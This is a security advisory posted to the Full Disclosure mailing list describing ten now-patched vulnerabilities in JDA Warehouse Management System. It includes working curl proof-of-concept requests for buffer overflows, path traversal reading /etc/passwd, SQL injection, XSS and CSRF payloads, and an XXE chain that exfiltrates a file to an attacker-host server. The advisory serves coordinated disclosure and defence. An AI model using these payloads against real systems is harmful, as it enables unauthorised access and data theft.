[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] JDA Warehouse Management System (WMS) Multiple Critical Vulnerabilities

Multiple critical vulnerabilities were identified in JDA Warehouse
management system (WMS).
The vulnerabilities were discovered during a
black box security assessment and therefore the vulnerability list
should not be considered exhaustive.

Affected Software and Versions
   - Tested with JDA WMS (most recent version at the date of July 2017)
   - All vulnerabilities are fixed as of patch 2017.2 (released at the end
of 2017)

No CVEs have been assigned yet.

The vulnerabilities were discovered by Xiaoran Wang from Google Security

The author would like to thank John Vrankovich from JDA for coordinating
the security fixes promptly and diligently.

Vulnerability Overview
WMS-01 Remote unauthenticated buffer overflow in ./seamles/lib/libSeamLES.so
WMS-02 Remote unauthenticated buffer overflow in ./moca/lib/MOCAbase.so
WMS-03 Remote unauthenticated command execution in wmstst
WMS-04 Remote unauthenticated path traversal and arbitrary file download in
moca request “download client component”
WMS-05 Remote unauthenticated SQL injection in wmstst/dcs/lib/DCSint.so
WMS-06 Remote unauthenticated XXE in WMS backend HTTP service
WMS-07 No XSS protection in the WMS portal
WMS-08 Improper CSRF protection
WMS-09 Unauthenticated RMI Registry and servers from webtst
WMS-10 Privilege escalation through “compress file” command in moca request

Vulnerability Details
WMS-01 Remote unauthenticated buffer overflow in ./seamles/lib/libSeamLES.so
Severity: CRITICAL

In 0x10c7e6, a strcpy is used to copy the user supplied user_id into a
buffer of 100 bytes.A user_id that’s longer than 100 bytes will trigger the
daemon crash, possibly leading to code execution. This can be triggered by
sending the “sl_log error msg_log” command to a vulnerable WMS wmstst
server. An example request is like the following. (replace server and port
with the vulnerable one)

curl -X POST --data "<moca-request
name='i_user_id' type='STRING' oper='EQ'>$(python -c 'print
"A"*1000')</field></context><query>sl_log error
msg_log</query></moca-request>" --header "content-type:
application/moca-xml" http://server:port/service

This can be verified by stracing the parent wmstst process and look for new
child process being spawned.
sudo strace -ff -s 1500 -p wmstst_parent_pid -e execve

WMS-02 Remote unauthenticated buffer overflow in ./moca/lib/MOCAbase.so
Severity: CRITICAL

In 0x358D, an array is used to store segments of the format string and it’s
allocated to hold 300 string segment pointers. However, if an attacker pass
a format string that has more than 300 formatters, it will overflow the
stack, possibly causing code execution. This can be triggered by sending
the “sprintf data” command to a vulnerable WMS wmstst server. An example
request is like the following. (replace server and port with the vulnerable

curl -X POST --data "<moca-request
autocommit='true'><environment></environment><context><field name='format'
type='STRING' oper='EQ'>$(python -c 'print "%n"*10000')</field><field
name='args' type='STRING'
data</query></moca-request>" --header "content-type: application/moca-xml"

This can be verified by stracing the parent wmstst process and look for new
child process being spawned
sudo strace -ff -s 1500 -p wmstst_parent_pid -e execve,fork,clone

WMS-03 Remote unauthenticated command execution in wmstst
Severity: CRITICAL

In wmstst, moca-request are sent to the backend server to retrieve data or
perform tasks. There are 9413 commands (files ends with .mcmd), out of
which 226 are not authenticated. There are at least a dozen commands within
this group should be guarded with authentication. For example, (“dump data”
accepts a “dump_command” parameter that allows arbitrary MOCA command
execution (all SQL operations, reading files, etc.), “download file”
downloads any file from the server, “get trace file” also downloads any
file from the server, “get encryption information” returns the encryption
key used, “list web session keys” outputs all sessions on the server,
“compress file” overwrite existing files, etc.)

The list of unauthenticated commands are in Appendix I.

WMS-04 Remote unauthenticated path traversal and arbitrary file download in
moca request “download client component”
Severity: CRITICAL

The “download client component” looks for files to download within two
dozen directories in
However, it does not prevent the user from putting “../../” into the file
name, bypassing the restriction. For example, sending the following request
to the vulnerable command handler downloads /etc/passwd from the host. This
is high risk as the endpoint is also not authenticated.

curl -X POST --data '<moca-request
name="filename" type="STRING"
client component</query></moca-request>' --header "content-type:
application/moca-xml" http://host:port/service (replace host and port with
the vulnerable service)

WMS-05 Remote unauthenticated SQL injection in wmstst/dcs/lib/DCSint.so
Severity: CRITICAL

In intGetNextLabel, a SQL statement like the following is constructed where
the %s is replaced by used supplied string without sanitization. "select
'X' from prsmst where prtadr = '%s'  and rerprt is not null ". This can be
triggered by sending a “get next label” query to the vulnerable wmstst moca
service handler

curl -X POST --data "<moca-request
autocommit='true'><environment></environment><context><field name='prtadr'
type='STRING' oper='EQ'>' or 'x'='y'--'</field></context><query>get next
label</query></moca-request>" --header "content-type: application/moca-xml"
Response indicates a SQL error. Database Error: 511 - ORA-00907: missing
right parenthesis

WMS-06 Remote unauthenticated XXE in WMS backend HTTP service
Severity: HIGH

The backend service listening on port 4650 is vulnerable to XXE and allows
an attacker to steal any files that the user “wmstst” is able to access. To
1. Create a file that’s accessible to wmstst, such as /tmp/secretfile with
mode 744. Put some content into the file, such as “topsecret_included”.
This is the target file we want to steal.  (echo “topsecret_included” >
/tmp/secretfile&& chmod 744 /tmp/secret)
2. On the attacker server, start a simple HTTP server with the following
file to be served. Replace your attacker-host and attacker-port.
ee.xml, <!ENTITY % data SYSTEM "file:///tmp/secretfile"><!ENTITY % param1
"<!ENTITY &#x25; exfil SYSTEM 'http://attacker-host:attacker-port
3. Send the following curl request to the vulnerable backend HTTP service.
(replace attacker-host and attacker-port with your own, same as victim-host
and victim-port)
curl -X POST --data '<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-host:attacker-port/ee.xml";> %sp;
%param1; %exfil; ]><moca-request
autocommit="true"><environment></environment><query>get encryption
information</query></moca-request>' --header "content-type:
application/moca-xml" http://victim-host:victim-port/service
4. Observe the HTTP server log to see the content of the secret being
sniffed out

WMS-07 No XSS protection in the WMS portal
Severity: MEDIUM

Inputting any field with scripts such as “<img src=x onerror=alert(2)>”
will trigger the script to execute. This happens in editing field names,
searching keywords, etc. An attacker can inject a malicious script to run
in the victim’s context and steal data.
There’s a referrer check that enforces the data is coming only from the
same domain. However checking for referrer is not sufficient as there are
always ways to bypass it. For example, the referrer checks in this case
does not enforce HTTPS on the referrer, allowing a network attacker to
spoof a HTTP site with the same domain.

WMS-08 Improper CSRF protection
Severity: MEDIUM

There is a CSRF token in every request to the main WMS portal, however the
CSRF token is in the cookie. This defeat the purpose of CSRF protection as
browsers send them automatically along with other cookies. For example,
sending the following requests (with the right headers and cookie values)
result in change of data at the backend.

POST /data/WM/wm/addresses?siteId=DC0001&_dc=1497973569329 HTTP/1.1
Host: wms-host
Cookie: REFSSessionID=jkhj; JDA-CSRF=3738e726-aec2-4222-bbff-47a6116e371c

{"addressId":"","hostExternalId":"","addressName":"<IMG SRC=X
ONERROR=ALERT(101)>","addressLine1":"<IMG SRC=X
ONERROR=ALERT(104)>","addressLine2":"<IMG SRC=X
ONERROR=ALERT(105)>","addressLine3":"","city":"Ylo","state":"<IMG SRC=X

WMS-09 Unauthenticated RMI Registry and servers from webtst
Severity: MEDIUM

Webtst uses ehcache, which listens for cache syncs from peers. It opens
port 40001 as its RMI registry exposing objects such as tokenCache,
sessionCache, exportCache, etc. that stores authentication tokens, session
information, and exported data from WMS. All of them can be accessed
without authentication. The RMI server lives on port 40340 however for some
reason the server is not running or started correctly. Hence, the severity
of the issue is only moderate.
Through unauthenticated RMI registry port 40001, it’s also discovered that
RMI objects “hotfixes, nodeInfo and cacheEventBus” are available on port
46978. Connecting to 46978 required no authentication and an attacker can
use “object.getElements(object.getKeys())” to get all of the attributes in
those objects, as well as potentially invoking other functions.

WMS-10 Privilege escalation through “compress file” command in moca request
Severity: MEDIUM

The “compress file” command in ./mcs/src/cmdsrc/mcsbase/compress_file.mcmd
compress a file given its path specified in the request and put the
compressed file in the same directory with an extension also specified in
the request. Unfortunately the compressed file is always world readable
even if the previous file is not. An attacker can leverage this to read
files that they do not have access to. For example,
1. create a file named /tmp/secretfile and give it 640 permission.
2. Send the following request to compress the file.  (replace the server
and port to be the vulnerable moca server)
curl -X POST --data '<moca-request
name="filename" type="STRING" oper="EQ">/tmp/secretfile</field><field
name="extension" type="STRING"
oper="EQ">gz</field></context><query>compress file</query></moca-request>'
--header "content-type: application/moca-xml" http://server:port/service
3. A new compressed file is created in /tmp/secretfile.gz which will be
world readable.

Appendix I: List of unauthenticated moca requests
     translate control characters to string
     sl_get now
      sl_handle xml_file_using_stax
     sl_db constraint
     sl_free java_cache
      sl_list ftp_files
     sl_handle xml_file_using_dom
     sl_get ifd_data_as_xml_str
     sl_send ifd_data_xml_get
     sl_handle xml_string_using_dom
      sl_send ifd_data_xml_init
      sl_get transformed_xml_string
     sl_send file_to_sftp
     sl_list sl_version
     sl_validate xml_file
     translate string to control characters
      sl_send file_to_ftp
     sl_db import_constraints
     sl_list sftp_files
      sl_get transformed_xml_file
     sl_log error msg_log
     sl_get ifd_data_for_head_event
      sl_pkchange description
     sl_send ifd_data_xml_add
     sl_get trigger_file_name
      sl_handle xml_string_using_stax
      sl_convert xml_data_by_unescaping
      sl_db create_constraint
      sl_check perf_post_proc_ifd_for_xml
     generate pk colval
      sl_send ifd_data_xml_finish
     sl_jsock send_msg vcstd hardware
      sl_jsock reply_msg dm
      sl_jsock reply_msg vcstd hardware
     sl_jsock reply_msg vcodr
     sl_jsock proc_inb_thread vox
     sl_jsock reply_msg wcs
     sl_jsock proc_inb_thread wcs
     sl_jsock proc_inb_thread std
     sl_jsock send_msg dm
     sl_jsock reply_msg vcstd
      sl_jsock send_msg wcs
      sl_jsock proc_inb_thread vc
      sl_jsock send_msg vcodr
     sl_jsock reply_msg std
      sl_jsock send_msg std
     sl_jsock proc_inb_thread vcstd
      sl_jsock reply_msg vc
      sl_jsock reply_msg vcstd test alg
     sl_jsock proc_inb_thread vcodr
     sl_jsock send_msg vc
     sl_jsock reply_msg vox
      sl_jsock proc_inb_thread dm
      sl_jsock send_msg vox
identify sample_segment_edi_940
      compress file
      list toolbar config
      list grid definitions
      get addon_id keys
     list work flow form link
      get dynamic rf configurations
      get buttonbar
     get client hooks
      get grid config
      get rdt variable lookup
     get policy information
      get form file
      convert user password decrypt
      get policy fields
     list grid view details
      get les lookups
      list grid views
      download client component
      get work flow
     get les custom field
      get command columns
     get system comment
     get work flow data
      list buttonbar config
      get les actions
      get buttons
     get buttonbar config
      convert user password encrypt
      get form data
      get les command
     get les lookup
     get dynamic configurations
      get les variable lookup
      get password expiration information
     get grid display rules
      get policy field values
     get system update info
      check single signon
      list work flow apps
      download file
     get les variable input
     list comp versions
     get toolbar config
     get policy areas
     get les variable configuration
     get addon_id
     list work flow
      get system update timestamp
      get les variable validation
     list grid menu items
     get les variable valid possibility
     get les variable default
      get trace file size
     acknowledge message for device
      get toolbar
     get les lookup field
     get les variable
     check for messages
      get top level buttons
      get host name
     list work flow forms
     get rdt var config
      list grid views by user
     get cache time stamp
     get login fields
      change option
     login user
     validate user password
      remove option
     validate federale authentication request
     handle login failure
      get login fields data
      get rdt mls catalog
      get les mls catalog
     get system description
      get time zone information
     get mls text
      get mls catalog
     get encryption information
      decrypt file using RPBF
     get trace file
      reorder columns
      dump data
     sprintf data
     set process priority
      format data
     check command syntax
     get db
      list library versions
     get current trace levels
      set trace
      encrypt file using RPBF
     list library version
      format control file
     login webservice
     login user
  validate federated authentication request
   validate federale authentication request
     log ems event
     submit ems primed event
      submit ems raised events
      sample create results
     sample get map
     sample split mapping
      sample do something
     sample add map
      sample create map
      sample add map
      sample split string
     sample get dst
     sample hello world
      remove web session
     list web session keys
     list web sessions
      get web device types
     list web session ages
     list active users
     check 3pl single client disable
     create velocity type
     change velocity type
      list rf policies
      get next label
      load rf policies
      get label file
     get next bom line
      get addon_id
      get next note line
     get next invoice line
      get login fields
      create assignment from result set
     check single scan loading for fluid load
     acknowledge message for device
     list rf vendors for web
      configure setmaxqvl flag
     configure export type for order line
      configure dynamic slotting fields
      configure inventory service type new mode
     configure mincatch quantity
     configure rft rackquiz
configure supplier consigned fields for receiving
     configure form close_trlr fields
     configure trlr_num criteria mode
     configure cnfrm_asset_tag field enable
 configure inventory service type criteria mode
      configure supplier consigned fields
      configure cnfrm trailer asset tag field
 configure check in trailer asset fields enable
     configure invalid cat button
      configure fields for pickup
     configure allocatecatch quantity
     configure fields for asset typ
     configure clientid fields visibility
     configure clsrcvtrkopr fields visibility
     configure distromnt fields
      configure part clientid fields visibility
     configure default inventory status field
     configure export type for shipment
      configure starter pallet fields
      configure receive invoice line fields
     configure trlrmgtopr fields enable
     configure dispatchtrlr fields enable
 configure supplier consigned fields for invadj
      configure trailer asset fields enable
     configure minimum shelf life field
configure supplier consigned fields at warehouse
      configure bomcatch quantity
      configure trailer asset fields visibility
      list rf runnable forms
     list rf vendors
      get locale for warehouse
     list rf terminals

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/